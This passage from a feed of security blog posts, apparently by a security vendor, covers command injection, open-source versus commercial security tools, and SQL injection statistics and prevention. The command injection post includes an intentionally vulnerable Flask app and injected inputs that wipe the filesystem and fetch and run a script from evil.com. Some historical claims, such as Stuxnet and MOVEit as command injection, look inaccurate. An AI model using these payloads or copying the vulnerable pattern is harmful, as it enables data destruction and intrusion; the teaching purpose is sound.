&lt;p&gt;Command injection will continue to be a problem however because we did see a significant drop this year with large organizations putting a focus on this vulnerability, there is hope to think that command injection may become less prominent in the future if we continue to bring awareness to it.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;Bonus Content&lt;/strong&gt;
&lt;/h2&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;A History of Command Injection: Prominent Breaches&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Command injection has been a persistent threat for a long time. In fact there was a significant command injection vulnerability that was present in bash from 1989 all the way to 2014. More recently in 2024 the importance of command injection was highlighted by the CISA and FBI showing it is still a big concern.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Early Days of Command Injection&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;First Known Usage:&lt;/strong&gt; Command injection vulnerabilities emerged with the rise of multi-user computing systems in the 1970s and 1980s, allowing attackers to execute arbitrary commands via unsanitized inputs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;1980s and 1990s:&lt;/strong&gt; The proliferation of web technologies led to increased exploitation of command injection, particularly through improperly secured CGI scripts.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;2. Significant Breaches and Exploits&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;1998: The First Documented Web-based Command Injection Attack:&lt;/strong&gt; A vulnerability in a widely used Perl-based CGI script was exploited, marking one of the first major web-based command injection incidents.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2010: Stuxnet Worm (Embedded Command Injection):&lt;/strong&gt; Stuxnet utilized command injection to target industrial control systems, demonstrating the vulnerability's reach beyond traditional IT environments.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;3. 2010s: Exploitation at Scale&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;2014:&lt;/strong&gt; &lt;a href="https://en.wikipedia.org/wiki/Shellshock_%2528software_bug%2529?utm_source=chatgpt.com" rel="noopener noreferrer"&gt;Shellshock Vulnerability&lt;/a&gt;&lt;strong&gt;:&lt;/strong&gt; Shellshock (CVE-2014-6271) exploited Bash's command processing, affecting millions of systems worldwide.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2018:&lt;/strong&gt; &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0101#:~:text=A%2520vulnerability%2520in%2520the%2520Secure,or%2520to%2520remotely%2520execute%2520code." rel="noopener noreferrer"&gt;Cisco ASA VPN Exploit (CVE-2018-0101)&lt;/a&gt;&lt;strong&gt;:&lt;/strong&gt; A command injection vulnerability in Cisco's ASA software allowed remote code execution, compromising enterprise security.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;4. 2020s: Modern Exploits and Trends&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;2020:&lt;/strong&gt; &lt;a href="https://bishopfox.com/blog/citrix-adc-gateway-rce-cve-2023-3519" rel="noopener noreferrer"&gt;Citrix ADC Gateway Exploit:&lt;/a&gt; Attackers exploited command injection vulnerabilities in Citrix systems, leading to significant data breaches.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2023:&lt;/strong&gt; &lt;a href="https://projectdiscovery.io/blog/moveit-transfer-sql-injection" rel="noopener noreferrer"&gt;MOVEit Vulnerability (SQL and Command Injection)&lt;/a&gt;&lt;strong&gt;:&lt;/strong&gt; A command injection flaw in MOVEit Transfer software led to widespread data breaches across multiple organizations.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Realistic command injection vulnerability&lt;/strong&gt;
&lt;/h3&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;The Vulnerable Code&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Let's look at a slightly more complex example of command injection. Below is some code for a simple Python web application. It allows users to create a ZIP archive of specified files by sending a POST request to the &lt;code&gt;/archive&lt;/code&gt; route.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from flask import Flask, request
import os

app = Flask(__name__)
@app.route('/archive', methods=['POST'])
def archive_files():

files = request.form.get('files')  # User provides file names to archive

archive_name = request.form.get('archive_name')  # User provides archive name

command = f"zip {archive_name}.zip {files}"  # Command built dynamically

os.system(command)  # Execute the system command

return f"Archive {archive_name}.zip created successfully!"
if __name__ == "__main__":
app.run(debug=True)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  &lt;strong&gt;How It Works&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;The user supplies:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;files&lt;/code&gt; (e.g., &lt;code&gt;file1.txt file2.txt&lt;/code&gt;) to specify which files to include in the archive.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;archive_name&lt;/code&gt; to specify the name of the resulting zip archive.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The code constructs a shell command dynamically:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;zip archive_name.zip file1.txt file2.txt&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The &lt;code&gt;os.system()&lt;/code&gt; function executes the command, allowing the user-provided inputs to dictate its behavior.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Exploitation&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;An attacker exploits this by injecting additional commands into the &lt;code&gt;archive_name&lt;/code&gt; or &lt;code&gt;files&lt;/code&gt; inputs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Input Provided by the Attacker:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;archive_name&lt;/code&gt;&lt;strong&gt;:&lt;/strong&gt; &lt;code&gt;my_archive; rm -rf /&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;files&lt;/code&gt;&lt;strong&gt;:&lt;/strong&gt; &lt;code&gt;file1.txt&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Resulting Command:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;zip my_archive.zip file1.txt; rm -rf /&lt;/code&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;code&gt;zip my_archive.zip file1.txt&lt;/code&gt;&lt;strong&gt;:&lt;/strong&gt; Creates an archive as expected.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;; rm -rf /&lt;/code&gt;&lt;strong&gt;:&lt;/strong&gt; Deletes all files on the server by executing a separate destructive command.&lt;/li&gt;
&lt;/ol&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;A More Sophisticated Example&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;The attacker might exploit this to download malware or exfiltrate data:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;archive_name&lt;/code&gt;&lt;strong&gt;:&lt;/strong&gt; &lt;code&gt;archive; curl -o malware.sh http://evil.com/malware.sh; bash malware.sh&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Resulting Command:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;zip archive.zip file1.txt; curl -o malware.sh http://evil.com/malware.sh; bash malware.sh&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;This command:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Creates an archive (&lt;code&gt;zip archive.zip file1.txt&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;Downloads malicious code (&lt;code&gt;curl -o malware.sh http://evil.com/malware.sh&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;Executes the malware (&lt;code&gt;bash malware.sh&lt;/code&gt;).&lt;/li&gt;
&lt;/ol&gt;

</description>
    </item>
    <item>
      <title>Balancing Security: When to Leverage Open-Source Tools vs. Commercial Solutions</title>
      <dc:creator>Felix Garriau</dc:creator>
      <pubDate>Fri, 15 Nov 2024 08:26:54 +0000</pubDate>
      <link>https://forem.com/aikidosecurity/balancing-security-when-to-leverage-open-source-tools-vs-commercial-solutions-3fc0</link>
      <guid>https://forem.com/aikidosecurity/balancing-security-when-to-leverage-open-source-tools-vs-commercial-solutions-3fc0</guid>
      <description>&lt;p&gt;When deciding what approach to use for security tooling, it seems like there are two choices.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;1.&lt;/em&gt; &lt;em&gt;&lt;strong&gt;Sell your left kidney&lt;/strong&gt;&lt;/em&gt; &lt;em&gt;and buy the enterprise solution whose name is on the side of a Formula 1 car.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;2.&lt;/em&gt; &lt;em&gt;&lt;strong&gt;Pick the free open-source tool&lt;/strong&gt;&lt;/em&gt; &lt;em&gt;that swipes right on more false positives than a dating app during a lonely Friday night.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Like everything in security, there is more to unpack in reality. In this article I want to explore when open-source security tools should be used, when commercial tools are more effective, and if we can trust tools built from an open-source core.&lt;/p&gt;

&lt;h2&gt;
  
  
  Build vs Buy (the open-source cost trap)
&lt;/h2&gt;

&lt;p&gt;As you grow your company, you will soon realize that the choice between open-source and commercial is more a choice between &lt;strong&gt;building tools&lt;/strong&gt; or &lt;strong&gt;buying tools.&lt;/strong&gt; Open-source provides a great starting point but they lack a lot of the features you need, dashboards, integrations, compliance reporting, remediation workflows, false positive filtering, and vulnerability prioritization, to name a few. So the idea that open-source is free simply isn’t true. This can be an advantage though, building as you go stretches out the initial investment and you can focus on features that are important to you. It means you aren’t relying on a vendor to deliver the feature they ‘promised’ they would deliver in Q3 2 years ago.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;There are plenty of negatives to consider when building on top of open-source tools.&lt;/strong&gt; Firstly not only will it take significant development time to build out these tools but it will also require continuous maintenance. Security tools can also block production when they are integrated into elements like CI/CD pipelines for example. This means when they fail or crash, they can cause losses in productivity with no support to help you get back online.&lt;/p&gt;

&lt;p&gt;What about the buy option then? Firstly there is no ramp-up period, you get complete coverage right from the beginning which results in less security debt later on. You also don’t lose the opportunity cost of taking engineering teams off your core objectives to focus on building features for internal tools. In the fast-paced startup world, don’t underestimate the value of this.&lt;/p&gt;

&lt;h2&gt;
  
  
  Open-source vs commercial
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://infogram.com/table-chart-1h1749woeoq9l2z?live" rel="noopener noreferrer"&gt;https://infogram.com/table-chart-1h1749woeoq9l2z?live&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Are commercial tools better at vulnerability discovery?
&lt;/h2&gt;

&lt;p&gt;So far we have talked about all the tool's features without even asking possibly one of the most important questions. &lt;strong&gt;What will find more vulnerabilities?&lt;/strong&gt; Generally speaking, the core functionality of open-source tools will often match their commercial counterparts in their ability to find vulnerabilities. Where commercial tools will pull ahead though is their ability to filter out false positives and prioritize their findings.&lt;/p&gt;

&lt;p&gt;Think of it like this, you have two fishing boats an open-source boat and a commercial boat. Both use the same net and catch just as much volume as each other, but the commercial tool has a processing plant that throws away the trash, sorts the fish into sizes and throws away the fish we can’t eat. Both boats caught the same results but the open-source tool is missing the next stage of triage.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2F4_cf8f2ac08d62b96d35cd814fe5da107a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2F4_cf8f2ac08d62b96d35cd814fe5da107a.png" width="800" height="800"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It is very often commercial tools that are built on open-source projects. For example, let's take Zen by Aikido, a full-featured in-app firewall that is designed to stop threats at runtime. So is it better at detecting run-time threats and stopping them than an open-source equivalent, not really, because it's based on an open-source project, AikidoZen. The value of the enterprise version is in its additional features like analysis, rule creation, deeper understanding of &lt;em&gt;Your&lt;/em&gt; specific threats, and ease of deployment, all things you would need to build yourself if you used the open-source version in an enterprise. So open-source isn’t necessarily worse, it just is missing the next stage of triage.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Note: Benchmarking tools against vulnerabilities found can also be very tricky. A great security tool might find fewer vulnerabilities because it is better at removing false positives based on context. Therefore the better tool isn’t always the one that finds the most, more often than not it's the opposite.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Powered by open-source built for enterprises
&lt;/h2&gt;

&lt;p&gt;So open-source is too much development and the commercial is too expensive, &lt;strong&gt;how about a happy medium&lt;/strong&gt;? Full-featured tools that use open-source at their core are not a new concept. Some of the most successful security products in the world use open source at their core like, Hashicorp Vault, Elastic Security, and Metaploit to name a few. There are many reasons why these tools do so well and it’s probably not for the reasons you think.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Cost-effectiveness&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Open-source powered tools not only need to compete with alternative commercial tools, they also must compete with their open-source base. That means their value must be proven and transparent often resulting in a more cost-effective offering.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Power of the community&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Often open-source tools are maintained and built by commercial companies, like &lt;a href="https://github.com/AikidoSec/firewall-node" rel="noopener noreferrer"&gt;Aikido Zen&lt;/a&gt;. Tools that are based on open-source are not just done so to reduce development time, but also because founders believe fundamentally in the power of open-source. Open-source tools are often faster at building features because they have a community behind them, it also means that if you have a specific and niche problem you can introduce it to the tool yourself.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Transparency&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Often buying commercial tools can be a little like buying a car without seeing its engine. How good/reliable is it in the long term? It is easier to hide weaknesses when someone can’t peer into the engine. Open-source powered tools cannot hide their engine so it is easier to feel confident in the tool itself.&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Commercial Features&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;As stated before, because an open-source-powered tool is often competing with both commercial alternatives and open-source tools it has to stand proudly behind its additional features. This will mean everything you expect from a commercial tool but often quite a bit more. Because the product benefits from a well-defined open-source base, attention can be spent on improvements which are ultimately passed onto the end user.&lt;/p&gt;

&lt;h2&gt;
  
  
  So what do I choose (final thoughts)
&lt;/h2&gt;

&lt;p&gt;We have discussed the advantages of open-source, commercial, and open-source powered security tools. I think it is clear from my tone that as the author I love the open-source community and believe open-source-powered tools to be a compromise on price without a compromise on features. It is of course idiotic to say that there is no reason why in some scenarios where a pure commercial version is better. There are great innovative solutions out there that are entirely closed-source. But my ultimate point is that just because something is based on an open-source project, it doesn’t mean it will compromise in ability or features. And because it needs to prove its value in complete transparency, it often offers deeper features and value.&lt;/p&gt;

&lt;p&gt;Aikido security was created by developers for developers to help get security done. We a proud of our open-source heritage and would love for you to come see it in action for yourself.&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;a href="https://aikido.dev/login" rel="noopener noreferrer"&gt;Get Started With Aikido Security For Free&lt;/a&gt;
&lt;/h3&gt;

</description>
    </item>
    <item>
      <title>The State of SQL Injections</title>
      <dc:creator>Felix Garriau</dc:creator>
      <pubDate>Sat, 09 Nov 2024 14:53:30 +0000</pubDate>
      <link>https://forem.com/aikidosecurity/the-state-of-sql-injections-44n3</link>
      <guid>https://forem.com/aikidosecurity/the-state-of-sql-injections-44n3</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fscreenshot-2024-11-09-at-154438_87d064008742ce1e32557cf8f9ad6f20.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fscreenshot-2024-11-09-at-154438_87d064008742ce1e32557cf8f9ad6f20.jpg" width="800" height="451"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;SQL injection (SQLi) has a history that is older than Internet Explorer (which according to Gen Z was the start of civilization). There have been thousands of breaches caused by SQL injection and an endless amount of well-documented best practices and tools to help prevent it. So surely, surely we learned our lesson from these breaches and SQLi is no longer an issue.&lt;/p&gt;

&lt;p&gt;We have been monitoring the amount of SQL injections discovered in open-source and closed-source projects to find out if we are in fact getting better and decided to give you a sneak peek into our up-and-coming State of Injection report for 2025.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Spoiler, turns out we are still terrible at preventing SQL injection.&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What is SQL injection?
&lt;/h2&gt;

&lt;p&gt;SQLi is a vulnerability that occurs when a program uses untrusted user input directly in a query to a SQL database. A  malicious user can then insert his own code and manipulate the query allowing the malicious user to access private data, bypass authentication or delete data. The example below shows how an insecure SQL query for a user login page is vulnerable to an SQLi authentication bypass attack.&lt;/p&gt;

&lt;p&gt;There are many different types of injection attacks like code injection or Cross Site Scripting (XSS). But SQLi specifically has played a prominent role in breaches for a very long time and comes as a shock to many that we still need to discuss this in 2024. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fscreenshot-2024-11-09-at-154523_9f3abb56a2c98ba90f464bc51dc963e5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fscreenshot-2024-11-09-at-154523_9f3abb56a2c98ba90f464bc51dc963e5.png" width="800" height="621"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  SQL History
&lt;/h2&gt;

&lt;p&gt;Ever since we started talking about security in our applications we have talked about SQL injection. It was even featured at number 7 on the very first OWASP top 10 chart in 2003, in 2010 was included in the injection category and took the number 1 spot until 2021. One of the &lt;a href="https://www.ftc.gov/sites/default/files/documents/cases/2003/06/ftc.gov-guesscmp.htm" rel="noopener noreferrer"&gt;first large-scale attacks&lt;/a&gt; documented involving SQL injection was when the clothing company Guess was targeted resulting in the leak of credit card numbers. Since then SQL injection has been a regular guest among security headlines.&lt;/p&gt;

&lt;p&gt;​&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fscreenshot-2024-11-09-at-154543_79834a524336770cafa9b5d1ad231ddf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fscreenshot-2024-11-09-at-154543_79834a524336770cafa9b5d1ad231ddf.png" width="800" height="451"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  SQL injection by the numbers
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Key Points&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;6.7% of all vulnerabilities found in open-source projects are SQLi&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;10% for closed-source projects&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;An increase in the total number of SQL injection in open-source projects (CVE that involve SQLi) from 2264&lt;/strong&gt; &lt;em&gt;&lt;strong&gt;(2023)&lt;/strong&gt;&lt;/em&gt; &lt;strong&gt;to 2400&lt;/strong&gt; &lt;em&gt;&lt;strong&gt;(2024)&lt;/strong&gt;&lt;/em&gt; &lt;strong&gt;is expected.&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;As a percentage of all vulnerabilities, SQL injection is getting less popular: a decrease of 14% and 17% for open-source and closed-source projects respectively from 2023 to 2024&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Over 20% of closed source organizations scanned vulnerable to SQL injection when they start using&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;For organizations vulnerable to SQL injection, the average number of SQL injection sites is nearly 30  separate instances&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We reviewed how many SQLi vulnerabilities were discovered in open-source packages in 2023 and so far in 2024. We then compared that to closed-source projects that have been discovered by Aikido Security customers. Unsurprisingly, we are still seeing shocking numbers of SQL injection in both closed and open-source projects. 6.7% of all vulnerabilities discovered in open-source projects in 2024 are SQL injection vulnerabilities while 10% of vulnerabilities discovered in closed-source projects were SQL injection vulnerabilities. This may not seem like a lot but it is frankly shocking that in 2024 we are still struggling to cope with some of the most basic vulnerabilities we know of.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The only good news we have&lt;/strong&gt; is that this number is a &lt;strong&gt;14% decrease from 2023&lt;/strong&gt; in open-source and a &lt;strong&gt;17% reduction&lt;/strong&gt; in closed-source projects as a percentage of all vulnerabilities found. However, the total number of SQLi found is expected in increase from 2264 in 2023 to over 2400 by the end of 2024 in open-source projects.&lt;/p&gt;

&lt;p&gt;This data was gathered by looking at relevant CWEs in the GitHub advisory database from the data of Aikido’s Customers. Primarily CWE-89 and CWE-74.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fscreenshot-2024-11-09-at-154557_eb64fbcf5bd212fcc6ea13d465fd5f24.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fscreenshot-2024-11-09-at-154557_eb64fbcf5bd212fcc6ea13d465fd5f24.jpg" width="800" height="598"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;​&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fscreenshot-2024-11-09-at-154610_8858d64f67b5fef02785a1368a47c505.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fscreenshot-2024-11-09-at-154610_8858d64f67b5fef02785a1368a47c505.png" width="800" height="599"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Preventing SQL injection
&lt;/h2&gt;

&lt;p&gt;Apparently, there isn’t enough information on the internet just yet on how to prevent SQL injection or we would be seeing these numbers as much less. Here are a few of the key points.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Use Prepared Statements and Parameterized Queries&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;In the example at the start of this Blog Post, we showed vulnerable code because it takes untrusted user input and uses it directly in a query. To avoid this we should use prepared statements which means defining your query first and then adding user input later. This means the database engineer interprets the SQL structure BEFORE adding the user input&lt;/p&gt;

&lt;p&gt;&lt;code&gt;import sqlite3&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;conn = sqlite3.connect('example.db')&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;cursor = conn.cursor()&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;user_id = 5  # Example safe input&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;# Safe query using parameterized query&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Server-side input/schema validation&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Input validation is effective in preventing SQLi but ONLY on the server side. Client-side input validation, which prevents a user from using characters in an input field for example, is great for user experience but can be bypassed by attackers (through direct http requests for example) so does little to prevent SQL injection. For example, if your API expects a credit card number, it’s easy to add numeric validation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Use SAST &amp;amp; DAST tools to discover SQLi&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;One of the most terrifying elements of SQLi is that it is easily discovered by adversaries often being described as a low-hanging fruit vulnerability. Part of this reason is because tools like DAST can automatically discover them. This can be used to our advantage and we can introduce these tools into our development process to catch them early.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Aikido has now launched their AI-powered SAST Autofix which can not just find SQLi vulnerabilities but suggest and verify code fixes!&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Implement an in-app firewall&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;An in-app firewall monitors traffic and activity inside your application and can detect attacks including injection and SQLi. This is more effective than a traditional WAF as it sits inside your application and is able to tokenize expected queries and block requests that change the command structure of the query.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Shameless plug for Aikido&lt;/em&gt;’s &lt;em&gt;new launch:&lt;/em&gt; &lt;a href="https://www.aikido.dev/zen" rel="noopener noreferrer"&gt;Zen&lt;/a&gt;&lt;em&gt;, the in-app firewall for peace of mind at runtime.&lt;/em&gt; &lt;a href="https://www.aikido.dev/zen" rel="noopener noreferrer"&gt;Get Zen&lt;/a&gt; &lt;em&gt;and it will automatically block critical injection attacks and zero-day threats in real-time, before they ever reach your database.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;e5. Avoid Dynamic SQL Where Possible&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Dynamic SQL generation through string concatenation is highly vulnerable to SQL injection. Whenever possible, stick to static, pre-defined queries and stored procedures that don’t rely on user-generated content for SQL structure.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;6. Allowlisting and escaping&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;In some cases, you cannot avoid Dynamic SQL, such as when querying dynamic tables, or when you want to order by a user-defined column and direction. If those cases you have no other option than to rely on regular expression allowlisting or escaping.  Escaping is taking user input that contains dangerous characters used in code like ‘&amp;gt;’ and turning them into a safe form. Ether by adding backslashes before them or transforming them into a symbol code. Note that this is different not only for each database type but can also depend on connection settings such as charset.&lt;/p&gt;

&lt;h2&gt;
  
  
  Will we ever see the end of SQLi
&lt;/h2&gt;

&lt;p&gt;While there is some promise in the fact we have seen a somewhat significant decrease in the number SQLi vulnerabilities found it is still disheartening to see that a vulnerability that predates the game DOOM is still such a significant threat to the landscape. The truth is, I can’t see this getting much better. As we introduce more tools to help us code faster, developers are getting less in touch with the core coding principles and these AI tools are notoriously bad at suggesting vulnerable code with injection vulnerabilities included.&lt;/p&gt;

&lt;p&gt;It is not all Doom and gloom (pun intended) though, we are seeing significant improvements in a new generation of SAST tools that are far more effective at discovering and fixing these vulnerabilities has the ability to drastically change the threat landscape.&lt;/p&gt;

&lt;p&gt;That’s all for now folks. Stay safe, and don’t forget to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;em&gt;Discover and automatically fix SQL injection with Aikido&lt;/em&gt; &lt;a href="https://help.aikido.dev/section/aikido-autofix/sgQMoUQEbbtY?utm_adgroup=&amp;amp;device=c&amp;amp;matchtype==&amp;amp;gclid=Cj0KCQiArby5BhCDARIsAIJvjIR2rSejog9zS2UeU7JCtm1WkkcOBc71C0doiNzEQLpd3zpJtA0W9ZUaAotrEALw_wcB&amp;amp;utm_term=&amp;amp;utm_campaign=21032947320&amp;amp;utm_source=adwords&amp;amp;utm_medium=cpc&amp;amp;utm_content=&amp;amp;hsa_acc=4523967680&amp;amp;hsa_cam=21032947320&amp;amp;hsa_grp=&amp;amp;hsa_ad=&amp;amp;hsa_src=x&amp;amp;hsa_tgt=&amp;amp;hsa_kw=&amp;amp;hsa_mt=&amp;amp;hsa_net=adwords&amp;amp;hsa_ver=3&amp;amp;gad_source=1" rel="noopener noreferrer"&gt;AI SAST Autofix&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;em&gt;Checkout&lt;/em&gt; &lt;a href="https://www.aikido.dev/zen" rel="noopener noreferrer"&gt;Zen&lt;/a&gt; &lt;em&gt;and prevent injection attacks as they happen&lt;/em&gt;
&lt;/li&gt;
